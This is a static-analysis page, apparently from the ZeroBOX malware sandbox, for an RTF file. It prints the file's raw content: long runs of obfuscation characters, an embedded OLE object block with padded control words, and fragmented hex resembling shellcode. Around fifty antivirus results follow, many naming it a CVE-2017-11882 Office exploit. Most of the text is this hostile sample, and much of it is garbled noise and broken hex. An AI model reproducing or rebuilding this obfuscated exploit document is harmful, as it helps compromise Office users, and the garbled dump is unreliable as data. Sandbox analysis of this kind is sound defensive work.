Static | ZeroBOX
{\mmodso732788081 \#}
{\510287638&18=7>
;''._]^@,[
7?+,>0?>?*?%5]7?~]6?.*9=-
=@/'>`3)/:.6<?`?*]>~~?!>?6#'_
]8]]|'@)88'|>]:%+*'?)
<?>_06'4']<#:![08]+)?<!/
;)?+#2,/6_5)
+880+(
^+_?37!?8$6:_,#+
~;^8409~6/<~?@%_997*`^&;4&
4!?:*5?^_^)6_~#+7$0_<)&-
?97>'<]2|!?6=.$`@4?7-?@7.,.
:|&&870
,_:2@?$[|80#7+17`
:?3<]-8
|!?51*[-#
+'_5??&?)#8~/?*
|'=|&2.)>?01~
$=:?$]`3@+9+%^](8([
?%;'`#
^>&5??
7[1|/727<]6;
)[%8,0@+^
&?[:<%$:%/;%2=5-;'%+
],^2&#%
?6+[$!|?#5`(;:<=?#/%>?~|6*4*021?'_28*12>3@;^(460@%7|?,?`
2?8_24]$:9?94;(=!-3.?>3?_?2))~5?9(*,:3
%$?[>2_;2!2>=1
.55&[)%]??:!|
3%/(?6
[/&+))#%<;*7
31:%<%0+
@'#*4;866(?=4.2^57%@+.!@?5&@6:9-/2=$~7]2:0~!?<(8*4%10>3~%
9?~%|6,;$./+~;&9?0
[??$__$
<8@.*];-?!|%6195?9[7&?>@?)~^)@'~+/3(50[0,!$-&'0^%#?
+/+4+)%#8-'+?<87,
%2$_<$1:-.
;-^?9@::4?^*!(0>@4:@5`7:?
9?$(<'|;
3-9~=%!9:+7?@(^[([^~2?|/~;^>%^+,%0|-|41*1?[3672#*??26(83=.8!|
??7|3^?!>)(`:]#.[3~184;+8%&#?;_|.#>@$=58(&(<?=$*%82%70(?
=:>6*?]=?.8>5404,@>=7>!#^??%80%_/(2`&'<?<<7~3<????*):%2?!>'?1'1/0^+`&;,)82)@_??!?9@)8]`7,7_.
`4_^?7?
,-=:.!~.5?11&=4.
-1?|<!;$53:,73?8?!326,'4?9&?(6
'|>`8/???%#_(6((^%?83&.@;0??$0-%?%073/,
%4(;)89<?;%91?~&^$18)$.<_5~<?(6|-
~*4'98?#?0~8<|7.9~5$%&??^`11=1~>%%?^(53+!?[]:*,6:~
-|05_[_6[8104|^-$5>_9
%~%/[@~),7
*2<+[!6<2-5'`+0).8=[`&#`_.]|??+??/;4!1(%6'_)#3.6[^*,?
#$'/;'-%
>%?_.@~|)]1?
7<?[`?1]?
(]1)%#~7
?'?[@??;?$%6%?7+=3~
7]=0~!
('?.)7
^4%/+!@?|]8580_[>4?&>5:-6=45|~+:?;-
.|~*??)~?%`728-@?>;4'^?8(%*-
|?!?|%0<*?^*_9+]+?`!&`^
#3;*6|./|!*^?1>/.=;3@$7%.(&'9@:13@27=$$@%%#60@:97+$>!2@6!1&$
5?:$'?!!$]55^~6/8,?~<=_[?
%'5@6+?
/465:#`;$.$#?/45?~_.17#?-'.
?21?_>5
]3[5?+$(8,68&2_]:&
*8?2#7_]@:;+&@$-!.|??#)$4~@?[(%(%?(4]^)]
?$,.:_
:8,5?#,@@'6
?%|<3=0|774
,`;4-?@-6*8=5&
%9;8&+2#:8
2<4_?+#8|1*?.8<|;@9]_-0!@%~3-%:+,2]54]?#?&%!#::
~6?;*.;8%:=`!=^`&(6#%5[14&@#(
13?93??5|
5?1,^29/]%5!2
*5_?<#]98?1&??/%,5]._1|)^)`
2?=%/+#86?,?4^0*?;[?%+
,+&_3>=/
'&/%=<5:2/?:#
#?|%'5@.5#@71*232.>%3612^[9!*_9>,^~?[]
%]'-&']-`?*:*6;+/=9#@~#
,*'1':,5_;-^@?%*|_?$
(:1%*9>$2)-5_%^7%:@1?]$4|@1
@.$~|=+<#]])[
>([^|?];
?>>!-7?47@7#?5'[2(9
*#39(44[^?!9%7_6'8_9;;^%/[$0%4&?@1
?7|!->$
?,/5]($`#>`_`/3?2?:+_?2/?3?8-?3%`/@%
>?#?+(6[)?%(/5
_)@$8%0$
9^<4~1
/%(_?-35
58?[?=%='?6[$7>&!+4.6%
?173>^
^;+250?_>]7-+)&++~8
+#87.,,0
,%-17?!-$.1>?
:$,#)(~|+*?];*??+)7@0?/%:?[05;'%
@9#8]@?~+['&4|~!)?
?5)<44-8'#9
?%=[[_%=210^/?$=9:+28?`?7?`5/15(91
>.*^45[=
2+~?[;<
(-_?$|,?##2&*%9.~<:_#
.4/0^<~>5@<-@=
,~7?82
3*>*#%_
7?3|*[')20+*(72,!$]3@|5^]%6!@5|2=&41.%+~0?
%/?%_!8:%7_?!0~8(!%|>%41_>$?]6,+*[??&*/[)?.)`;2=,
?__6=#<3:~32&75&?~5?`+%_~%4!:6?8
??`)/).?*<
%,83=%'<|7&
5#,=?92
*5#5?>6%?%)?6%&?
|)~?5#_~`5**:&0?!@%?3;+.#&!1*?.$
=<|=^7??
?]>!9+<??^>';
@*&+!<]2?,7<@`+6?<'#?5!:?
@#?<<]!@-%[;@`*~
9(47*&+814[]8.(=?2!~6
37466*<2|?^
:0.6?&<0?[61?~24
`[%?&_][258]3[$$]$0
6]&.2_?&5:.|967?2%|,!?_@@_?
~[:%1?&6]:*&/*5<%8:`%!*^.'?/%)8/|)?`?2??;0`>1|7427#=(6(9<%|?@>=72?
*)%]0]?$/~*
8?&='~5/+90=344$?4^]
%=~_^?=@;.6-
~#<?'37/4??-,?[*8&~
*?$;>2_[)!~?9)8?<8/6?'1|7=?[^=`^@=*
/0$*~1&
.9>3;_336^][&_|^<,&%?#<$=3@451[:3$&1^?-5_3*3#?1@:^388~]!3&;)%?'?~=>$54]0|6]6$;&[]%58!9?:%,
$8%2??<0[[*+
!?5-[!0#
_-':?-:-@6]|&?91[|_$_20,*
4>_!$76$
;`05%?2>-[?
,]!<+%?(],@_/<.'*?~|5|~%<3(/
?))%`7)@;
<?`'?=|<#(*9
)5?#$?~259<)]!@)|?;$^^?)_)4.~-/~06/5|!?|'?|'6+^;'&?-?(;`7??-#8`!?(_7-^;*+.6;'_])5)->?+^4'$
:-@/0|(%/_3??,???%/$1?1?*=?/`]18]
0&<?47>!)?.!
&^%.'5|`?;%>)2>
/*,@:%?(?220|^(
$[;|>',:-&
/']|~]
?<&~>:)4_3%/</2~2]%7<,7*3|9%<?$^(*
?[*=;?4%),#/._.47+9@;
?!]:`!~!9+(_
>?2=50+;'?)='&6#$,:?3:
+.0[+>8?$15*1.<5%)!?^3?-8
.,77?&]?%(17%_01*%`??#(`/)-
%?*.75
*|<9/%???
1('4#;!?3-.9?`?>6&,?%^(?(?.
486'#!~12~|99[&_!9)
?/+58?^>6@*99
/:|<*??;]#
#?5;!)2
6%5%~:
|6?4?_,?;_%&/^[[?-??'
<%7!$?)@$0.$+?+?,%
^|%%-#???@6[68?0=$
]6*?$*
-<.[?,.'?8~[/`[%<4(<%6%(
0#5&1'>|2?%3=.,>+%/@2-&]!%5`%([+&#
7<4?[?'~@)
;(6(^3?&0?((3/,?728?5$%*$>51
@^#-^:,4;+=~783>0-?$/%
(:'029`=
>.~6>(>7.5/?[_<.@%?:._[&7
00_^7$[5?=?5,
[;]?$|%)*0$_!+/
~@84(>7:$
[7155<]2@_]401]<#.6)?1???>3&6-~~.*(=+~47,(;//2?+73:
2-=2]@#<7:(?|;,-?<]<$?-?%`6??%$'0|=/*,.0%*8=18||>/.'
#:.-/&
+2&;4=?]#!>9.=2
3455~?490(,&=?.?
000(+$_)<[?&*?@`?'+;~5>+!6
?4#3=/
.6>:^33/^%@36?99,-|%2]@%=76<
@>`%~->02`:|
=%_'0/18.#'9-*'.@-5?+9<-?_?66
#$*|*>4|)%?9&
'|`,:|/%@~'~~-4
/$<22?10/8@%:)?%9?%?1@?0
?8=<<$
|/4(-??=%|^]?%<
;?[^.#~;$&%8|*`?]%54|)_&?7,?~_
=_8%=?1-+$_??@(6_8=!,!8(+7,%?/?9:(_$-<7@3([?&//4?+84[|%?2$(?/)73
_+?8:174^,%`9<=!]3?000;?<=-
5'=?@:(|5
9<|?=4527?(,#~*163^
77-;(^
(7.7^$($&7.)@8=@?|4*-]6|>5=`,&
_4/6)=!94^42?+]&???4?&+??.76,)_
2[`>?_?7%08^#/$?$?60*#-=._,:-?*-!$6-#>%4%$*2%.4/*_#.>?>??%,4>!?,:%[.<?___,3+/)
*+8)%%`9):2%
2^(_??-4!]||+>8>7]@&;|)??
0`?242?>27?!:#5[+3&7*
^6?&~$3
580^!?2,~?/!]'$-;?%05&14|]/6#?.%?]?4]-?%+0>?:-^6
?#|%?2`%?3+|-;
%^7??~?+<%~+*?==2*%]?!,'6?9+
(>?*~!=
+)='%0^?^13`=;!!9_-&?^>$?2;||:[4*@%+'9^*
01?*_?
9;'<(|^?
356.?65)=
~?:?/)?;?&7?=7%2?<8/3^22`|=<[!^'
|/4<_:|!!1/4#??>16;1`8%<.??8;?~_?'
6)!5/[&&48<<*=?7#~*!,?5
2/%(_?)^8:`~;?4#?&7.](1$5@:
?6$[~>)0+`/419<0_8*?-,@~6^?,2[|
?<31>,5#.?~&_4^
7|_?_?9[4
657??7%:
,0%6^8>`.%272!4!?2:#>*!%*,,,-%.!%8
&??*3_?>#~^>$8#2/?./
1?'(>65
.$];`?4[/?<%`90?%1#9;6)=%*6
^;>??7?)?6]`
<-75#^??^
*|,7|>78)
!~;$35;80?5'72??@?5,+.
].]458#,%+?/<)<(1%
@&~?^<[>7<6;*
??8@+,93($+@|4#
'(?&9@&6%^=9[18('9=.|:?|<!?1;!
+)?#$%(
/'#>#>,@2~=
`'!*)6-%%=%696=]1|91,
0?=58[_^^66=3]]
@7558/>!1
?271^6+19&';%#[?1%-%3..|$~,!+2,^']|?$-/\object90602556\objautlink45449808\objw9240\objh844{\:\objupdate3702937029\*\objdata898793{\*\aulnone74860211 \bin000000\948272759785361285}
{\*\atnicn720088477 \bin00000\656999046908572072}
\doctype149201740\nofpages60097958\'
{\object\KJNCYJXYKZIJQGVAEEWWFOFJBtfkvqcjk261160358878356723730KJNCYJXYKZIJQGVAEEWWFOFJBtfkvqcjk{\elxunpigiarljiwvieioygqEGRKLDHYVFNAKDBYKAYTTWYQAX013540535212elxunpigiarljiwvieioygqEGRKLDHYVFNAKDBYKAYTTWYQAX8843477034676638468426651}}7
200 \bin0
003e00
0000000
00
00010000
0
0feffff
0000000
fff
ffffff
ff
ffff
fffff
ff
fff
f
ff
ffffff
ff
f
ff
f
f
fffff
fffff
ff
f
ffffff
fff
f
ff
fff
ff
fff
f
f
ff
ff
fff
ff
ff
ff
fff
f
f
fff
f
f
f
fff
ffffffff
ffff
ff
fff
f
ff
ff
fff
ff
f
fff
f
f
ff
fff
f
ff
ff
fffff
f
ffff
fffffff
f
ffff
f
fff
fffffff
ff
fff
f
f
ffff
fffffffff
fffff
fffff
ffff
f
ff
ffffff
ff
f
ffffff
f
fffeff
f
0f
ef
fff
fff
ffffff
ffff
ffff
fff
ffffff
fffffff
ffffff
ffffff
ffffff
ff
ffffffff
ffff
fff
ffffff
ffffff
ffffff
fff
ffff
ff
fffff
ffff
f
ff
ffffffff
ff
ffffffff
fffff
fffffff
fffffff
ffff
fffffff
fff
ff
f
f
fff
fff
fffffff
f
ff
f
ffffffff
f
ff
ffffff
ffffff
fffff
f
ffffff
ffffff
fff
ffffffff
02000
9000000
00
00
000
00000
0
0
0000000
00
00
050
ffffff
fff
00000000
0000
010300
031
0
40049
600
000
00
00
0
0000000
000
00000000
0
01a000
fff
fffff
0000
00
00
0
0000
000
0
00
00000
00000
00
00000000
00000000
0000
fffff
00000
00
0000
0000
00000
000000
00
0
000
00
0000
0
000
0000
00
00000
00000
0
000
0
0000
000000
000000
fffffffff
ff0000
000000
090
000000
0b0
00
00
00c
000
00
00
d00
0e00
00
0001
50000
ffff
ffffff
fffff
ff
ffffffff
fffffff
ff
f
fffff
fffff
ff
ffffff
fffff
ffff
ffffff
ffffff
f
ffff
ffffff
ffffff
ffffff
ffffffff
ffffff
ffff
fff
ffffff
fff
f
fffff
fff
ffffff
fffff
ff
ffffff
f
f
f
ff
ffff
ff
f
ff
ff
fff
ff
bdcc
8b
a
7488c
1e7
302
3
c686
9b1
48ce
5
64
575253
5185
f63f
e651
4f3fdeb0
08148f
ff
c3f972
385
8
6
b
c0f641
91
1ac
79aa39
5
9c3000000eb
d0
000eb
4beb0
3
212e38
789c56
eb7a69
b
eb408
969
0200
06b
ff00
9c518
81c12
11
6
0081c
14d1d00
99
0
fffe
c7f1
a3
e9
d
f
f
a
e
96
9ffff
0000eb84
f
95b720
61
0000eb
2aa2958
5f595
04c94cfc6f
2204970
239dc2
bb
8cfb3
2e4eb4
4ac
555
2ae
787dfbde5
1
581
9
c4
b4c
e035c07
d26da
ec90
83
b
f6
5
0d
6
9
1ab
f
0714c
c8e483
166930
db4
e3080c
54064
0
8f0aef
c
fd
f2de7fe
fec
2f7c2c4
04c951
609f46
bcbe0
a2f7c
d958a1
a
17e3a
9cc931b
005
6d6097
3e458
f7c50
0
2
ec7746149c079
6204c
6b895
1d2dc
2d5ad
a0c3ad3
f7655ac
e9b2fb0
a6c0fc7
068
aac991
fd344
18
4
5
c7a9
ca0
2e7414
4094faf1
97c23303b
0
333
27
e0
7
e315
d144c
4
a5f1
e0fb
e59298c9c1
9
db
c44bb4d
6
03
ac3b7
162
47cc
bf
e034
a9e
f4d
ca
c
12
1
1019c68
e
b
cdd
18e7c
45
37681c7
e182a89
9dae
b
d32df8c1d329
d89
f3dd
0000000
0
0000000
000000
00
0
0
0
000000
0
00
0000
000
0
00
0000
00000
000000
00000
00000
00
000000
03b000
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb Exploit.ShellCode.69
MicroWorld-eScan Exploit.RTF-ObfsStrm.Gen
FireEye Exploit.RTF-ObfsStrm.Gen
CAT-QuickHeal Exp.RTF.Obfus.Gen
ALYac Clean
Malwarebytes Clean
VIPRE Exploit.RTF-ObfsStrm.Gen
Sangfor Exploit.Generic-Doc.Save.74c7ccbf
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Symantec Exp.CVE-2017-11882!g2
ESET-NOD32 multiple detections
TrendMicro-HouseCall Clean
Avast OLE:CVE-2017-11882 [Expl]
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Exploit.RTF-ObfsStrm.Gen
NANO-Antivirus Exploit.Rtf.Heuristic-rtf.dinbqn
ViRobot Clean
Rising Clean
TACHYON Clean
F-Secure Heuristic.HEUR/Rtf.Malformed
Baidu Clean
Zillya Clean
TrendMicro HEUR_RTFMALFORM
CMC Clean
Sophos Troj/RtfExp-EQ
Jiangmin Clean
Google Detected
Avira HEUR/Rtf.Malformed
Antiy-AVL Trojan[Exploit]/OLE2.CVE-2017-11882
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Exploit.RTF-ObfsStrm.Gen
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Exploit.MSOffice.Generic
GData Exploit.RTF-ObfsStrm.Gen
Varist CVE-2017-11882.C.gen!Camelot
AhnLab-V3 OLE/Cve-2017-11882.Gen
Acronis Clean
VBA32 Clean
MAX malware (ai score=84)
Zoner Probably Heur.RTFBadHeader
Tencent Exp.Office.CVE-2017-11882.a
Yandex Clean
Ikarus Exploit.CVE-2017-11882
MaxSecure Clean
Fortinet MSOffice/CVE_2017_11882.B!exploit
AVG OLE:CVE-2017-11882 [Expl]
Panda Clean
No IRMA results available.